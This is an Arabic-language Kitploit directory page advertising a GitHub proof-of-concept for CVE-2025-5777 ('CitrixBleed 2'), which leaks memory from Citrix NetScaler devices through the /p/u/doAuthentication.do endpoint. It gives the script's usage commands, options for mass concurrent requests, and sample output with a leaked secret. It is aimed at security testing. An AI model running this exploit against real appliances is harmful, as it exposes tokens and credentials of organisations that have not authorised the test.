Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5777 — إثبات المفهوم (PoC) لتسريب الذاكرة في Citrix NetScaler | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقالفريق الأحمر
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

إثبات المفهوم (PoC) لتسريب الذاكرة في Citrix NetScaler

عرض المستودع
241منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-5777 - إثبات المفهوم لتسرب الذاكرة في Citrix NetScaler

📌 الوصف

يستغل هذا السكربت ثغرة خطيرة في كشف الذاكرة في أجهزة Citrix NetScaler ADC/Gateway، والمعروفة باسم CVE-2025-5777 (وتُلقب بـ CitrixBleed 2). يؤدي إلى تسرب ذاكرة عبر نقطة النهاية /p/u/doAuthentication.do، مما يكشف ذاكرة غير مهيأة تحتوي على بيانات حساسة مثل أجزاء XML، والرموز، وربما بيانات الاعتماد.

  • 📅 معرف CVE: CVE-2025-5777
  • ⚙️ التأثير: كشف المعلومات
  • 🧑‍💻 المؤلف: [0xgh057r3c0n]
  • 🧵 التزامن: غير متزامن باستخدام aiohttp
  • 📦 التبعيات: aiohttp, colorama

🚀 الميزات

  • محرك طلبات جماعية غير متزامن باستخدام asyncio + aiohttp
  • تفريغ سداسي عشري (Hex dump) لشظايا الذاكرة المسربة
  • كشف تلقائي لتسرب الذاكرة <InitialValue>
  • وضع مفصّل (verbose) لتصحيح الأخطاء ومعاينة الاستجابة
  • معالجة أنيقة للمقاطعة (Ctrl+C)

  • 🧪 الاستخدام

    root@kitploit:~
    python3 CVE-2025-5777.py http://<target> [options]
    

    🔧 الخيارات

    الخيارالوصف
    -v, --verboseتفعيل مخرجات التصحيح المفصلة
    -p <proxy>استخدام وكيل HTTP (مثل http://127.0.0.1:8080)
    -t <threads>عدد الطلبات المتزامنة (الافتراضي: 10)

    📥 مثال

    root@kitploit:~
    python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
    

    📤 مثال على الإخراج

    root@kitploit:~
    _____________   _______________         _______________   ________   .________          .___________________________________ 
    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
     \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
            \/                  \/                  \/     \/         \/       \/                 \/                             
    
             Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                         Author: 0xgh057r3c0n
    
    [🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
    [✔️ ] Found InitialValue Memory Leak!
    [🧠] Hex Dump:
    ------------------------------------------------------------------------
    00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
    00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
    00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
    ------------------------------------------------------------------------
    
    [✔️ ] Leak confirmed. Continuing extraction...
    

    ⚠️ إخلاء المسؤولية

    هذا الدليل البرهاني مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط. الفحص أو الاستغلال غير المصرح به للأنظمة التي لا تملكها غير قانوني.


    تنزيل الأداة